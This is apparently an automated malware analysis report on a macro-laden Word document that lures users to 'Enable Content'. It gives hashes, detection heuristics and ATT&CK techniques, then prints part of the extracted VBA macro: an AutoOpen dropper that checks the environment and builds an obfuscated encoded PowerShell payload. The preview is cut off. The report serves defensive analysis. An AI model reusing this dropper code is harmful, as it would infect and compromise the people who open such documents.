Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 47a79c33524e7786…

MALICIOUS

Office (OLE)

Size: 108.5 KB
Created: 2018-03-19 16:38:00
Authoring application: Microsoft Office Word
First seen: 2018-09-04
MD5: 4bd2fcee80df39054b21adbd5f5d96fa
SHA-1: cc08674968d7858576da7d0198961e78f0a319de
SHA-256: 47a79c33524e7786346210a50c43761fc852bdf9d84c643bf4dfd34e592df9d3
Risk Score: 310

Malware Insights

MITRE ATT&CK
  • T1566.001 Spearphishing Attachment
  • T1059.005 Visual Basic
  • T1218.011 Signed Binary Proxy Execution: Rundll32

The sample is a malicious Office document containing VBA macros. The document body presents a lure to "Enable Content" to view updated terms of service, a common social engineering tactic. The AutoOpen macro uses GetObject to interact with WMI and the Environ function to access environment variables. It also contains obfuscated code that likely attempts to download and execute a second-stage payload, potentially involving PowerShell and rundll32.exe.

Heuristics 10

  • ClamAV: Doc.Dropper.Agent-6482566-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6482566-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • https://help.github.com/articles/github-terms-of-service-draft — In document text (OLE body)
    • https://help.github.com/articles/github-terms-of-service/ — In document text (OLE body)
    • https://github.com/contact/terms-of-service — In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 116142 bytes
SHA-256: 9e9a2c823783839f460d17848593bbc13ac3f5aa955e9654f0db1e0e0a18359c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "module1"
Sub AutoOpen()
On Error Resume Next
    Set ImogenPhotobiologic = GetObject("winmgmts:").Get("Win32_PingStatus.Address='location.microsoft.com',ResolveAddressNames=True")
    With ImogenPhotobiologic
        Debug.Print "Status Code: " & .StatusCode
        If .StatusCode = 0 Then
            EtzelUnpolishedness = False
        ElseIf .StatusCode > 0 Then
            EtzelUnpolishedness = False
        Else 'No DNS Resolution
            EtzelUnpolishedness = True
        End If
    End With
    
    Set ImogenPhotobiologic = GetObject("winmgmts:").Get("Win32_PingStatus.Address='" & Environ$("userdomain") & "',ResolveAddressNames=True")
    With ImogenPhotobiologic
        Debug.Print "Status Code: " & .StatusCode
        Debug.Print "Address: " & .Address
        If .StatusCode = 0 Then
            VeraPostmeridian = True
        ElseIf .StatusCode > 0 Then
            VeraPostmeridian = False
        Else 'No DNS Resolution
            VeraPostmeridian = False
        End If
    End With
    
    If EtzelUnpolishedness = True And VeraPostmeridian = True Then
    Dim UnstifflyGruesomest As String
    OutbowlTega = Array("w", "u", "o", "p", "e", "y", "b", "a", "t", "x", "-", "s", "d", "c", " ", "h", "r", "i", "n", "l")
    Dim LucierDruidism As String
    LucierDruidism = "SQBmACgAJ"
    Dim TetanineSpans As String
    TetanineSpans = "ABQAFMA"

    Dim ChancellorsvilleCalabresi As String
    ChancellorsvilleCalabresi = "VgBlAHIAcwB"


    Dim AutotomiesDemoniacally As String
    AutotomiesDemoniacally = "JAE8AbgBUAGEAYgBMAG"

    Dim ParcellingRubification As String
    ParcellingRubification = "UALgBQAFMAVgBlAFIAU"
    PreinsultDreck = PreinsultDreck & LucierDruidism & TetanineSpans & ChancellorsvilleCalabresi & AutotomiesDemoniacally & ParcellingRubification
    Dim StylizingAntebellum As String
    StylizingAntebellum = "wBpAE8ATgA"
    Dim MacroplanktonPostconvalescents As String
    MacroplanktonPostconvalescents = "uAE0AQQBKAE8AUgAg"

    Dim OrangoutanRelinquishments As String
    OrangoutanRelinquishments = "AC0ARwBFACAAMwApA"

    Dim LodesmanStet As String
    LodesmanStet = "HsAJABHAFAAR"


    Dim FlorianMesosome As String
    FlorianMesosome = "gA9AFsAcg"


    PreinsultDreck = PreinsultDreck & StylizingAntebellum & MacroplanktonPostconvalescents & OrangoutanRelinquishments & LodesmanStet & FlorianMesosome
    Dim SpoliatingUnindigent As String
    SpoliatingUnindigent = "BlAGYAXQAuAEEAUwBzA"
    UnstifflyGruesomest = UnstifflyGruesomest + OutbowlTega(3)
    UnstifflyGruesomest = UnstifflyGruesomest + OutbowlTega(2)
    Dim EmanationVelated As String
    EmanationVelated = "GUATQBi"


    Dim GeomorphicNontransient As String
    GeomorphicNontransient = "AEwAWQAuAEcARQB"


    Dim OratressPentad As String
    OratressPentad = "0AFQAeQBQAEUAKA"

    Dim CurrentnessDuecentist As String
    CurrentnessDuecentist = "AnAFMAeQBzAHQAZQBtAC4"
    PreinsultDreck = PreinsultDreck & SpoliatingUnindigent & EmanationVelated & GeomorphicNontransient & OratressPentad & CurrentnessDuecentist
    Dim ClyfakerCapercailye As String
    ClyfakerCapercailye = "ATQBhAG4AYQB"


    Dim SurveyalAiluroidea As String
    SurveyalAiluroidea = "nAGUAbQB"


    Dim PelecyopodaUnmeekly As String
    PelecyopodaUnmeekly = "lAG4AdAA"
    Dim OlusteeAinhum As String
    OlusteeAinhum = "uAEEAdQB0AG8Ab"


    Dim BimodulusOverpenalize As String
    BimodulusOverpenalize = "QBhAHQAaQBvAG4ALgBVAH"
    PreinsultDreck = PreinsultDreck & ClyfakerCapercailye & SurveyalAiluroidea & PelecyopodaUnmeekly & OlusteeAinhum & BimodulusOverpenalize
    Dim PororocaTrachypterus As String
    PororocaTrachypterus = "QAaQBsAHMAJw"
    Dim Anticonsume
... (truncated)